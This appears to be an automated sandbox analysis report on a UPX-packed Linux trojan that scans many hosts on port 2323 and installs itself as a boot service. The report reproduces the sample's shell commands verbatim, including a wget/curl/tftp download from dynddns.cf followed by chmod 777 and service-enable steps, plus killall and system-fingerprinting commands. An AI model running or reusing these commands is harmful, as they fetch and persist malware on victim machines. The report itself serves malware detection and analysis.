Source: global trafficTCP traffic: 192.168.1.101:24466 -> 8.238.9.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 92.119.208.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.92.5.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 145.102.44.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.12.13.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 181.164.176.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.101.222.143:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.80.138.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.99.129.214:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.198.252.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.184.139.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.248.162.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 157.35.143.71:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.134.6.208:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.32.24.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.22.188.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 180.74.199.193:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.98.185.221:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.84.52.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 146.89.6.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.199.173.106:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.104.42.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 95.1.201.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.190.219.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.141.22.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.44.121.102:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.12.86.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.246.151.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.206.11.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.243.14.243:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.1.46.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.98.118.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.20.231.209:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 145.86.77.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 194.211.147.8:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.190.188.162:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.106.250.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 52.185.237.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 166.58.30.120:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.156.181.46:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 68.199.184.67:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.215.155.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.26.177.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.4.106.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.145.127.87:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.158.13.95:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 5.83.239.32:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.220.185.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.4.36.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.159.73.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.44.82.10:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 117.73.89.87:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.24.179.56:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 79.138.227.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 90.101.200.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 82.158.248.113:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 189.148.11.71:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 171.47.216.82:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.129.222.246:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.184.104.225:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.231.75.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.222.195.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.230.229.29:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.93.85.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.52.164.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.46.14.249:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 144.102.241.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 114.76.95.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.49.72.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 171.99.204.139:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.44.3.182:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 92.135.235.65:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.168.11.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.233.58.179:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 129.154.155.191:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.142.80.203:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 213.38.211.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.167.216.199:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.194.157.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.52.175.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.65.11.232:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.21.219.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.148.22.51:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.108.129.128:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.21.34.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 129.17.72.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 217.154.6.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 163.87.1.101:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.18.140.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.251.146.44:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.103.30.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.39.141.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.131.108.58:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 52.139.254.84:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.72.168.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.199.247.159:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 79.233.25.191:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 190.87.254.116:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.65.84.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.44.247.108:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 63.207.217.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 165.119.184.187:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.253.48.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 149.95.42.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.190.102.150:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 174.172.113.148:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.51.178.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.193.228.51:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.150.29.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.123.88.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.65.61.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.211.252.232:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.119.73.246:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.95.9.171:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 147.165.138.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.206.19.231:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 180.217.50.139:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.115.47.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.74.241.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.85.102.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.210.138.110:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.182.83.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 87.170.126.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.251.196.144:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.164.243.65:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.187.105.19:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.158.166.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.150.87.116:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 132.13.16.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.154.73.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.255.85.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.113.246.135:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 204.243.54.233:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.226.249.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 151.170.233.46:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.177.113.162:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 138.51.93.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 208.166.165.1:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.97.87.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.138.154.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.52.254.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.171.190.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.140.133.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.124.158.172:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.107.209.221:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.203.12.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.31.1.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 23.124.216.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.129.118.192:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.225.138.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.225.168.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.228.124.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.246.148.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.145.19.28:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 107.65.38.52:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.13.26.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.123.77.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.0.197.198:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 150.29.184.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 198.156.180.187:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 165.17.63.206:2323
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 3104)Wget executable: /bin/wget -> wget http://dynddns.cf/start/help/start -O start
HTTP GET or POST without a user agent
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /mail/
Connects to IPs without corresponding DNS lookups
Source: unknownTCP traffic detected without corresponding DNS query: 106.243.152.204
Source: unknownTCP traffic detected without corresponding DNS query: 73.180.94.204
Source: unknownTCP traffic detected without corresponding DNS query: 190.50.145.205
Source: unknownTCP traffic detected without corresponding DNS query: 141.17.21.205
Source: unknownTCP traffic detected without corresponding DNS query: 167.176.147.131
Source: unknownTCP traffic detected without corresponding DNS query: 117.236.182.146
Source: unknownTCP traffic detected without corresponding DNS query: 130.189.64.208
Source: unknownTCP traffic detected without corresponding DNS query: 102.179.206.82
Source: unknownTCP traffic detected without corresponding DNS query: 213.34.163.8
Source: unknownTCP traffic detected without corresponding DNS query: 167.46.24.165
Source: unknownTCP traffic detected without corresponding DNS query: 45.247.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 68.234.141.53
Source: unknownTCP traffic detected without corresponding DNS query: 51.98.193.45
Source: unknownTCP traffic detected without corresponding DNS query: 36.161.120.107
Source: unknownTCP traffic detected without corresponding DNS query: 82.212.63.77
Source: unknownTCP traffic detected without corresponding DNS query: 5.254.39.27
Source: unknownTCP traffic detected without corresponding DNS query: 114.182.52.108
Source: unknownTCP traffic detected without corresponding DNS query: 199.171.96.221
Source: unknownTCP traffic detected without corresponding DNS query: 65.160.229.245
Source: unknownTCP traffic detected without corresponding DNS query: 61.190.93.73
Source: unknownTCP traffic detected without corresponding DNS query: 205.100.153.245
Source: unknownTCP traffic detected without corresponding DNS query: 54.215.105.24
Source: unknownTCP traffic detected without corresponding DNS query: 80.27.38.58
Source: unknownTCP traffic detected without corresponding DNS query: 194.191.162.217
Source: unknownTCP traffic detected without corresponding DNS query: 183.184.138.234
Source: unknownTCP traffic detected without corresponding DNS query: 183.99.203.48
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.206.123
Source: unknownTCP traffic detected without corresponding DNS query: 54.162.241.70
Source: unknownTCP traffic detected without corresponding DNS query: 112.101.71.56
Source: unknownTCP traffic detected without corresponding DNS query: 159.183.63.187
Source: unknownTCP traffic detected without corresponding DNS query: 98.179.130.153
Source: unknownTCP traffic detected without corresponding DNS query: 219.175.220.13
Source: unknownTCP traffic detected without corresponding DNS query: 84.119.154.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.97.68.76
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.56.119
Source: unknownTCP traffic detected without corresponding DNS query: 51.199.234.20
Source: unknownTCP traffic detected without corresponding DNS query: 101.133.17.78
Source: unknownTCP traffic detected without corresponding DNS query: 42.255.246.119
Source: unknownTCP traffic detected without corresponding DNS query: 106.247.32.206
Source: unknownTCP traffic detected without corresponding DNS query: 130.154.3.180
Source: unknownTCP traffic detected without corresponding DNS query: 64.196.14.9
Source: unknownTCP traffic detected without corresponding DNS query: 49.24.159.81
Source: unknownTCP traffic detected without corresponding DNS query: 50.185.208.244
Source: unknownTCP traffic detected without corresponding DNS query: 157.42.236.166
Source: unknownTCP traffic detected without corresponding DNS query: 18.253.144.70
Source: unknownTCP traffic detected without corresponding DNS query: 75.98.229.97
Source: unknownTCP traffic detected without corresponding DNS query: 46.190.226.93
Source: unknownTCP traffic detected without corresponding DNS query: 155.165.89.84
Source: unknownTCP traffic detected without corresponding DNS query: 32.56.239.68
Source: unknownTCP traffic detected without corresponding DNS query: 155.81.131.224
Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /start/help/start HTTP/1.1User-Agent: Wget/1.14 (linux-gnu)Accept: */*Host: dynddns.cfConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /start/help/start HTTP/1.1User-Agent: curl/7.29.0Host: dynddns.cfAccept: */*
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: dynddns.cf
Urls found in memory or binary data
Source: agJPi4fCrP, start.20.drString found in binary or memory: http://upx.sf.net

DDoS:

Searches for CPU information (likely indicative for DDoS capability)
Source: /bin/sh (PID: 3191)Executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Executes the "free" command used for querying memory usage (likely indicative for DDoS or mining capabilities)
Source: /bin/sh (PID: 3205)Free executable: /bin/free -> free

System Summary:

Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappingsProgram segment: 0x400000
Yara signature match
Source: agJPi4fCrP, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Classification label
Source: classification engineClassification label: mal64.troj.evad.mine.lin@0/2@6/0

Data Obfuscation:

Sample is packed with UPX
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

Sample tries to persist itself using System V runlevels
Source: /bin/wget (PID: 3104)File: /etc/rc.d/init.d/start
Source: /bin/curl (PID: 3129)File: /etc/rc.d/init.d/start
Source: /bin/ln (PID: 3146)File: /etc/rc.d/dynddns.cftart -> /etc/init.d/start
Sets full permissions to files and/or directories
Source: /bin/sh (PID: 3145)Chmod executable with 777: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 2881)Killall command executed: killall Netis
Source: /bin/sh (PID: 2882)Killall command executed: killall " "
Source: /bin/sh (PID: 2883)Killall command executed: killall " "
Counts the number of processes currently running
Source: /tmp/agJPi4fCrP (PID: 3102)Ps with wc executed: /bin/sh -> sh -c "(cd /etc/init.d;wget http://dynddns.cf/start/help/start -O start;curl http://dynddns.cf/start/help/start -o start;tftp -g -l sshd -r starthelpstart dynddns.cftart;chmod 777 /etc/init.d/startpstart dynddns.cftart;ln -s /etc/init.d/start /etc/rc.d/dynddns.cftart;update-rc.d start defaultstc/rc.d/dynddns.cftart;/lib/systemd/systemd-sysv-install enable startrt;systemctl enable startysv-install enable startrt;chkconfig --add starttysv-install enable startrt;chkconfig start onarttysv-install enable startrt;" "dev/null 2>&1"
Source: /bin/sh (PID: 3145)Ps with wc executed: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Source: /tmp/agJPi4fCrP (PID: 3267)Ps with wc executed: /bin/sh -> sh -c "ps aux | wc -l"
Source: /bin/sh (PID: 3274)Ps with wc executed: /bin/ps -> ps aux
Source: /bin/sh (PID: 3275)Ps with wc executed: /bin/wc -> wc -l
Enumerates processes within the "proc" file system
Source: /bin/killall (PID: 2881)File opened: /proc/89/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2034/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2034/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/352/stat
Source: /bin/killall (PID: 2881)File opened: /proc/353/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1974/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1974/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2029/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2029/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/993/stat
Source: /bin/killall (PID: 2881)File opened: /proc/477/stat
Source: /bin/killall (PID: 2881)File opened: /proc/631/stat
Source: /bin/killall (PID: 2881)File opened: /proc/632/stat
Source: /bin/killall (PID: 2881)File opened: /proc/995/stat
Source: /bin/killall (PID: 2881)File opened: /proc/90/stat
Source: /bin/killall (PID: 2881)File opened: /proc/10/stat
Source: /bin/killall (PID: 2881)File opened: /proc/11/stat
Source: /bin/killall (PID: 2881)File opened: /proc/13/stat
Source: /bin/killall (PID: 2881)File opened: /proc/14/stat
Source: /bin/killall (PID: 2881)File opened: /proc/15/stat
Source: /bin/killall (PID: 2881)File opened: /proc/16/stat
Source: /bin/killall (PID: 2881)File opened: /proc/17/stat
Source: /bin/killall (PID: 2881)File opened: /proc/18/stat
Source: /bin/killall (PID: 2881)File opened: /proc/19/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2320/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1351/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2162/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2162/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/363/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1349/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1/stat
Source: /bin/killall (PID: 2881)File opened: /proc/364/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1623/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1623/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2/stat
Source: /bin/killall (PID: 2881)File opened: /proc/3/stat
Source: /bin/killall (PID: 2881)File opened: /proc/4/stat
Source: /bin/killall (PID: 2881)File opened: /proc/5/stat
Source: /bin/killall (PID: 2881)File opened: /proc/6/stat
Source: /bin/killall (PID: 2881)File opened: /proc/7/stat
Source: /bin/killall (PID: 2881)File opened: /proc/8/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1907/stat
Source: /bin/killall (PID: 2881)File opened: /proc/9/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1903/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2837/stat
Source: /bin/killall (PID: 2881)File opened: /proc/20/stat
Source: /bin/killall (PID: 2881)File opened: /proc/21/stat
Source: /bin/killall (PID: 2881)File opened: /proc/22/stat
Source: /bin/killall (PID: 2881)File opened: /proc/27/stat
Source: /bin/killall (PID: 2881)File opened: /proc/28/stat
Source: /bin/killall (PID: 2881)File opened: /proc/29/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1919/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1919/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2055/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2175/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2052/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2052/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2051/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1910/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2207/stat
Source: /bin/killall (PID: 2881)File opened: /proc/376/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1633/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1633/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/377/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2325/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2325/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2600/stat
Source: /bin/killall (PID: 2881)File opened: /proc/378/stat
Source: /bin/killall (PID: 2881)File opened: /proc/653/stat
Source: /bin/killall (PID: 2881)File opened: /proc/653/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/379/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2048/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2048/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2169/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2169/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2323/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2323/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/1871/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2047/stat
Source: /bin/killall (PID: 2881)File opened: /proc/656/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2046/stat
Source: /bin/killall (PID: 2881)File opened: /proc/659/stat
Source: /bin/killall (PID: 2881)File opened: /proc/30/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2847/stat
Source: /bin/killall (PID: 2881)File opened: /proc/38/stat
Source: /bin/killall (PID: 2881)File opened: /proc/39/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2100/stat
Source: /bin/killall (PID: 2881)File opened: /proc/380/stat
Source: /bin/killall (PID: 2881)File opened: /proc/381/stat
Source: /bin/killall (PID: 2881)File opened: /proc/382/stat
Source: /bin/killall (PID: 2881)File opened: /proc/383/stat
Source: /bin/killall (PID: 2881)File opened: /proc/383/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/384/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2060/stat
Source: /bin/killall (PID: 2881)File opened: /proc/385/stat
Source: /bin/killall (PID: 2881)File opened: /proc/385/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/660/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1525/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2218/stat
Source: /bin/killall (PID: 2881)File opened: /proc/386/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1920/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1920/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/1643/stat
Source: /bin/killall (PID: 2881)File opened: /proc/268/stat
Source: /bin/killall (PID: 2881)File opened: /proc/664/stat
Executes commands using a shell command-line interpreter
Source: /tmp/agJPi4fCrP (PID: 2877)Shell command executed: sh -c "(killall Netis >/dev/null 2>&1 & killall \" \" >/dev/null 2>&1 & killall \" \" >/dev/null 2>&1) >/dev/null 2>&1"
Source: /tmp/agJPi4fCrP (PID: 3102)Shell command executed: sh -c "(cd /etc/init.d;wget http://dynddns.cf/start/help/start -O start;curl http://dynddns.cf/start/help/start -o start;tftp -g -l sshd -r starthelpstart dynddns.cftart;chmod 777 /etc/init.d/startpstart dynddns.cftart;ln -s /etc/init.d/start /etc/rc.d/dynddns.cftart;update-rc.d start defaultstc/rc.d/dynddns.cftart;/lib/systemd/systemd-sysv-install enable startrt;systemctl enable startysv-install enable startrt;chkconfig --add starttysv-install enable startrt;chkconfig start onarttysv-install enable startrt;" "dev/null 2>&1"
Source: /tmp/agJPi4fCrP (PID: 3191)Shell command executed: sh -c "grep -c ^processor /proc/cpuinfo"
Source: /tmp/agJPi4fCrP (PID: 3200)Shell command executed: sh -c "free|grep \"Mem:\"|awk '{print $2 \" KB\"}'||printf \"Ram Not Found\n\""
Source: /tmp/agJPi4fCrP (PID: 3227)Shell command executed: sh -c "if [ -f /usr/bin/yum ]; then cat /etc/system-release|head -n1; elif [ -f /usr/bin/apt-get ]; then lsb_release -d|awk '{$1= \"\"; print $0}'|head -n1 ; elif [ -f /usr/bin/install ]; then busybox|head -n1|awk '{print $1\" \"$2}';fi"
Source: /tmp/agJPi4fCrP (PID: 3248)Shell command executed: sh -c "uname -r"
Source: /tmp/agJPi4fCrP (PID: 3261)Shell command executed: sh -c "uname -n"
Source: /tmp/agJPi4fCrP (PID: 3267)Shell command executed: sh -c "ps aux | wc -l"
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 3145)Chmod executable: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 3191)Grep executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Source: /bin/sh (PID: 3206)Grep executable: /bin/grep -> grep Mem:
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 3274)Ps executable: /bin/ps -> ps aux
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /bin/sh (PID: 3152)Systemctl executable: /bin/systemctl -> systemctl enable startysv-install enable startrt
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 3104)Wget executable: /bin/wget -> wget http://dynddns.cf/start/help/start -O start
Reads system information from the proc file system
Source: /bin/sh (PID: 2877)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3102)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3191)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 3191)Reads from proc file: /proc/cpuinfo
Source: /bin/sh (PID: 3200)Reads from proc file: /proc/meminfo
Source: /bin/free (PID: 3205)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3227)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3248)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3261)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3267)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 3274)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 3274)Reads from proc file: /proc/stat
Writes ELF files to disk
Source: /bin/wget (PID: 3104)File written: /etc/rc.d/init.d/start
Source: /bin/curl (PID: 3129)File written: /etc/rc.d/init.d/start

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
